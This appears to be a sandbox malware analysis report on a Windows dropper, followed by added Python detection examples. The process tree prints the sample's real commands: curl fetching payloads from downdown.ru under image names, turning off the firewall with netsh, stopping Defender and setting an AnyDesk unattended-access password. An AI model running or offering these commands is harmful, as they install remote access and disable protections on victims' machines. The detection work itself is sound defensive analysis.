Windows
Analysis Report
eqRHH2whJu.exe
Overview
General Information
Sample name: | eqRHH2whJu.exe (renamed because the original name is a hash value) |
Original sample name: | f18374fa790c5bbf7bc272c10a26f56db99b7d7eee08c986fa4bd20c3c455387.exe |
Analysis ID: | 1585989 |
MD5: | 685f86f41db34f2ec805449037aa32c9 |
SHA1: | 8391ca015c12b166b806f196b04bb617b3d8d377 |
SHA256: | f18374fa790c5bbf7bc272c10a26f56db99b7d7eee08c986fa4bd20c3c455387 |
Tags: | exe, user-adrian__luca |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Disables DEP (Data Execution Prevention) for certain images
Disables Windows Defender (via service or powershell)
Downloads files with wrong headers with respect to MIME Content-Type
Drops PE files with benign system names
Found stalling execution ending in API Sleep call
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global get message hook
Machine Learning detection for sample
Modifies Group Policy settings
Modifies the windows firewall
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Yara detected Defender Control Hacktool
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a global mouse hook
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w10x64
- eqRHH2whJu.exe (PID: 2344 cmdline: "C:\Users\user\Desktop\eqRHH2whJu.exe" MD5: 685F86F41DB34F2EC805449037AA32C9)
- Acrobat.exe (PID: 6996 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Intel\ 131.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
- AcroCEF.exe (PID: 7304 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- AcroCEF.exe (PID: 7560 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1736,i,7992334855485178110,2343866547744839284,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- cmd.exe (PID: 3740 cmdline: "C:\Windows\System32\cmd.exe" /c echo>C:\Intel\rezet.cmd cd C:\Intel\ MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- attrib.exe (PID: 7224 cmdline: "C:\Windows\System32\attrib.exe" +s +h C:\Intel MD5: 0E938DD280E83B1596EC6AA48729C2B0)
- conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7292 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd ping -n 6 127.0.0.1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7416 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\driver.exe http://downdown.ru/driver.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 8052 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\blat.exe http://downdown.ru/blat.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 8140 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\svchost.exe http://downdown.ru/svchost.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7452 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\Trays.rar http://downdown.ru/Trays.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 2120 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\AnyDesk\wol.ps1 http://downdown.ru/wol.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 8172 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\dc.exe http://downdown.ru/dc.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7024 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\Trays.rar C:\Intel\ /y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 1648 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd start C:\Intel\Trays\Trays.lnk MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 5960 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd svchost.exe --install C:\Intel\AnyDesk MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7652 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd netsh advfirewall set allprofiles state off MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7072 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd sc stop WinDefend MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 8176 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\AnyDesk\bat.bat http://downdown.ru/bat.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 2120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 8128 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\AnyDesk\bat.lnk MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 8240 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Intel\rezet.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 8252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- PING.EXE (PID: 8484 cmdline: ping -n 6 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
- curl.exe (PID: 8844 cmdline: C:\Intel\curl.exe -o C:\Intel\driver.exe http://downdown.ru/driver.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
- curl.exe (PID: 8916 cmdline: C:\Intel\curl.exe -o C:\Intel\blat.exe http://downdown.ru/blat.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
- curl.exe (PID: 8972 cmdline: C:\Intel\curl.exe -o C:\Intel\svchost.exe http://downdown.ru/svchost.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
- curl.exe (PID: 9032 cmdline: C:\Intel\curl.exe -o C:\Intel\Trays.rar http://downdown.ru/Trays.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
- curl.exe (PID: 9068 cmdline: C:\Intel\curl.exe -o C:\Intel\AnyDesk\wol.ps1 http://downdown.ru/wol.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
- curl.exe (PID: 9092 cmdline: C:\Intel\curl.exe -o C:\Intel\dc.exe http://downdown.ru/dc.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
- driver.exe (PID: 9120 cmdline: C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\Trays.rar C:\Intel\ /y MD5: 29086D9247FDF40452563C11B3DCA394)
- Trays.exe (PID: 9176 cmdline: "C:\Intel\Trays\Trays.exe" -tray MD5: 90D208B856DEA18596D57FFB1DD3A867)
- 4t-min64.exe (PID: 9208 cmdline: "C:\Intel\Trays\4t-min64.exe" "C:\Intel\Trays\ShellEh6055x64.dll" MD5: 7BC3AEEDC18717D796F1C7FF8DBF0C17)
- svchost.exe (PID: 9196 cmdline: svchost.exe --install C:\Intel\AnyDesk MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- svchost.exe (PID: 1464 cmdline: "C:\Intel\svchost.exe" --local-service MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- svchost.exe (PID: 5084 cmdline: "C:\Intel\svchost.exe" --local-control MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- netsh.exe (PID: 4216 cmdline: netsh advfirewall set allprofiles state off MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
- sc.exe (PID: 7664 cmdline: sc stop WinDefend MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
- curl.exe (PID: 8028 cmdline: C:\Intel\curl.exe -o C:\Intel\AnyDesk\bat.bat http://downdown.ru/bat.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
- cmd.exe (PID: 8916 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Intel\AnyDesk\bat.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- cmd.exe (PID: 6844 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo QWERTY1234566 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- AnyDesk.exe (PID: 4376 cmdline: AnyDesk.exe --set-password _unattended_access MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- dc.exe (PID: 8964 cmdline: C:\Intel\dc.exe /D MD5: 139464919440E93E49C80CC890B90585)
- svchost.exe (PID: 7408 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 7660 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 7932 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 7032 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- SgrmBroker.exe (PID: 1792 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
- svchost.exe (PID: 6472 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 7316 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- AnyDesk.exe (PID: 8320 cmdline: "C:\Intel\AnyDesk\AnyDesk.exe" --service MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- AnyDesk.exe (PID: 3312 cmdline: "C:\Intel\AnyDesk\AnyDesk.exe" --control MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- AnyDesk.exe (PID: 2860 cmdline: "C:\Intel\AnyDesk\AnyDesk.exe" --new-install MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- AnyDesk.exe (PID: 8948 cmdline: "C:\Intel\AnyDesk\AnyDesk.exe" --crash-handler MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- cleanup
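The process tree above gives the whole chain in plain command lines: cmd.exe assembles C:\Intel\rezet.cmd one `echo>>` line at a time; the batch then fetches payloads with a bundled curl.exe from downdown.ru under .jpg names and saves them as .exe, .rar, .ps1 and .bat; it extracts a password-protected RAR with a renamed archiver (driver.exe x ... -hp<password>); installs a renamed AnyDesk (C:\Intel\svchost.exe --install); turns the firewall off (netsh advfirewall set allprofiles state off); stops Defender (sc stop WinDefend); and finally sets an unattended-access password (the child cmd.exe that only echoes QWERTY1234566 is how a piped `echo <password> | AnyDesk.exe --set-password` shows up in a process tree). The detection logic below is an added example written for this page, not part of the Joe Sandbox report. It runs over process-creation events constructed from the command lines above (image paths for the system binaries are assumed, and the last event is a benign svchost.exe control) and flags each of those behaviours with a small rule set. The patterns are deliberately literal; real command lines can be obfuscated, so treat them as a starting point, not a complete detection.

```python
import re
from collections import defaultdict

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SYSTEM_NAMES = {"svchost.exe", "conhost.exe", "cmd.exe", "netsh.exe", "sc.exe"}
PAYLOAD_EXT = (".exe", ".dll", ".ps1", ".bat", ".cmd", ".rar", ".lnk")
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".bmp")

# Constructed process-creation events built from the command lines in the report.
# Image paths of the system binaries are assumed; the last event is a benign control.
EVENTS = [
    {"pid": 7416, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'"C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\driver.exe http://downdown.ru/driver.jpg'},
    {"pid": 8844, "image": r"C:\Intel\curl.exe",
     "cmd": r"C:\Intel\curl.exe -o C:\Intel\driver.exe http://downdown.ru/driver.jpg"},
    {"pid": 9068, "image": r"C:\Intel\curl.exe",
     "cmd": r"C:\Intel\curl.exe -o C:\Intel\AnyDesk\wol.ps1 http://downdown.ru/wol.jpg"},
    {"pid": 9120, "image": r"C:\Intel\driver.exe",
     "cmd": r"C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\Trays.rar C:\Intel\ /y"},
    {"pid": 9196, "image": r"C:\Intel\svchost.exe",
     "cmd": r"svchost.exe --install C:\Intel\AnyDesk"},
    {"pid": 4216, "image": r"C:\Windows\System32\netsh.exe",
     "cmd": "netsh advfirewall set allprofiles state off"},
    {"pid": 7664, "image": r"C:\Windows\System32\sc.exe",
     "cmd": "sc stop WinDefend"},
    {"pid": 4376, "image": r"C:\Intel\AnyDesk\AnyDesk.exe",
     "cmd": "AnyDesk.exe --set-password _unattended_access"},
    {"pid": 7408, "image": r"C:\Windows\System32\svchost.exe",
     "cmd": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS"},
]

CURL_RE = re.compile(r"curl(?:\.exe)?\s.*?-o\s+(\S+)\s+(https?://\S+)", re.I)


def masquerading_download(ev):
    """curl fetching an image-named URL but writing an executable, script or archive."""
    m = CURL_RE.search(ev["cmd"])
    if not m:
        return None
    dest, url_path = m.group(1).lower(), m.group(2).lower().split("?", 1)[0]
    if url_path.endswith(IMAGE_EXT) and dest.endswith(PAYLOAD_EXT):
        return "download: image URL saved as %s" % dest.rsplit(".", 1)[1]
    return None


def batch_assembly(ev):
    """Batch file written line by line with echo redirection, as rezet.cmd was."""
    if re.search(r"\becho\s*>>?\s*\S+\.(?:cmd|bat)\b", ev["cmd"], re.I):
        return "staging: batch script assembled with echo redirection"
    return None


def encrypted_rar_extract(ev):
    """Command-line RAR extraction with -hp<password> (header-encrypted archive)."""
    if re.search(r"\s-hp\S+.*\.rar\b", ev["cmd"], re.I):
        return "staging: password-protected RAR extracted"
    return None


def system_name_wrong_path(ev):
    """Sigma 'System File Execution Location Anomaly': svchost.exe outside System32."""
    image = ev["image"].lower()
    if image.rsplit("\\", 1)[-1] in SYSTEM_NAMES and not image.startswith(SYSTEM_DIRS):
        return "masquerading: system binary name outside System32"
    return None


def firewall_off(ev):
    if re.search(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", ev["cmd"], re.I):
        return "defense evasion: Windows Firewall disabled via netsh"
    return None


def defender_tampered(ev):
    if re.search(r"\bsc(?:\.exe)?\s+(?:stop|config|delete)\s+WinDefend\b", ev["cmd"], re.I):
        return "defense evasion: WinDefend service stopped or reconfigured via sc"
    return None


def anydesk_unattended(ev):
    if re.search(r"anydesk(?:\.exe)?\s.*--set-password", ev["cmd"], re.I):
        return "persistence: AnyDesk unattended-access password set from the command line"
    return None


RULES = (masquerading_download, batch_assembly, encrypted_rar_extract,
         system_name_wrong_path, firewall_off, defender_tampered, anydesk_unattended)


def analyze(events):
    """Map each PID that trips at least one rule to its rule labels, in RULES order."""
    hits = defaultdict(list)
    for ev in events:
        for rule in RULES:
            label = rule(ev)
            if label:
                hits[ev["pid"]].append(label)
    return dict(hits)


if __name__ == "__main__":
    for pid, labels in analyze(EVENTS).items():
        print(pid, labels)
```

The rules are keyed on the image path and command line only, which is what Sysmon Event ID 1 or Windows 4688 (with command-line auditing enabled) give you; the benign BITS host in the last event shows why the "system binary name" rule must check the directory rather than the name alone. The same chain also leaves file-system evidence (attrib +s +h on C:\Intel, the .jpg-named bodies that are really PE files), which this block does not cover.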
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_DefenderControlHacktool | Yara detected Defender Control Hacktool | Joe Security | ||
JoeSecurity_DefenderControlHacktool | Yara detected Defender Control Hacktool | Joe Security | ||
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: vburov: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-08T15:53:37.877777+0100 | 2025161 | 1 | A Network Trojan was detected | 185.125.51.5 | 80 | 192.168.2.7 | 49745 | TCP |
2025-01-08T15:53:37.877777+0100 | 2025169 | 1 | A Network Trojan was detected | 185.125.51.5 | 80 | 192.168.2.7 | 49745 | TCP |
2025-01-08T15:53:45.712427+0100 | 2008754 | 1 | A Network Trojan was detected | 185.125.51.5 | 80 | 192.168.2.7 | 49801 | TCP |
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Binary or memory string: | memstr_45d83196-0 |
Source: | Static PE information: |
Source: | File created: | ||
Source: | File created: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 52_2_00A2CD06 | |
Source: | Code function: | 52_2_00A2FCDD | |
Source: | Code function: | 58_2_0040F8BC | |
Source: | Code function: | 59_2_045C4400 | |
Source: | Code function: | 59_2_00407C0E | |
Source: | Code function: | 59_2_0040DB44 | |
Source: | Code function: | 59_2_0040DDDC | |
Source: | Code function: | 60_2_021D4400 | |
Source: | Code function: | 62_2_021D4400 | |
Source: | Code function: | 63_2_021D4400 |
Source: | Code function: | 59_2_00407D0E |
Source: | Code function: | 61_2_00418560 |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | Network Connect: |
Source: | Image file has PE prefix: |
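"Image file has PE prefix", together with "Downloads files with wrong headers with respect to MIME Content-Type" in the signature list, is what the .jpg-named downloads from downdown.ru trip: the URL (and, per the sandbox verdict, the response headers) claim an image, while the body starts with an MZ/PE header. The check below is an added example, not code from the report. It sniffs the leading bytes of a downloaded body, confirms a real PE by following e_lfanew to the "PE\0\0" signature, and compares the result with what the URL extension or Content-Type claimed. The Content-Type values and the minimal PE bytes are constructed for the example; the report does not list the actual response headers.

```python
import struct

# Magic numbers of the image formats a ".jpg"-style URL or image/* Content-Type may claim.
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")


def sniff(data: bytes) -> str:
    """Classify a body by its leading bytes: an image kind, 'pe', 'mz-stub' or 'unknown'."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    if len(data) >= 0x40 and data[:2] == b"MZ":
        # e_lfanew at offset 0x3C points at the "PE\0\0" signature of a genuine PE file.
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
            return "pe"
        return "mz-stub"  # MZ header without a PE signature: DOS stub, or a truncated PE
    return "unknown"


def claims_image(url: str, content_type: str) -> bool:
    """True when either the URL extension or the Content-Type header advertises an image."""
    path = url.lower().split("?", 1)[0]
    return path.endswith(IMAGE_EXT) or content_type.lower().startswith("image/")


def is_masquerading(url: str, content_type: str, data: bytes) -> bool:
    """True when URL or Content-Type says image but the body is a PE (or an MZ stub)."""
    return claims_image(url, content_type) and sniff(data) in ("pe", "mz-stub")


def minimal_pe() -> bytes:
    """Constructed 70-byte body: a DOS header with e_lfanew=0x40, then a PE signature."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + b"PE\0\0" + b"\x4c\x01"  # Machine field: IMAGE_FILE_MACHINE_I386


if __name__ == "__main__":
    # URL from the report; the Content-Type header value is constructed for the example.
    print(is_masquerading("http://downdown.ru/driver.jpg", "image/jpeg", minimal_pe()))
```

Checking e_lfanew rather than only the two MZ bytes avoids flagging arbitrary data that happens to start with "MZ", and the separate "mz-stub" outcome keeps a truncated or header-only download visible instead of silently passing it as unknown. A proxy or sandbox applies the same logic to the first few hundred bytes of every response whose URL or Content-Type claims an image.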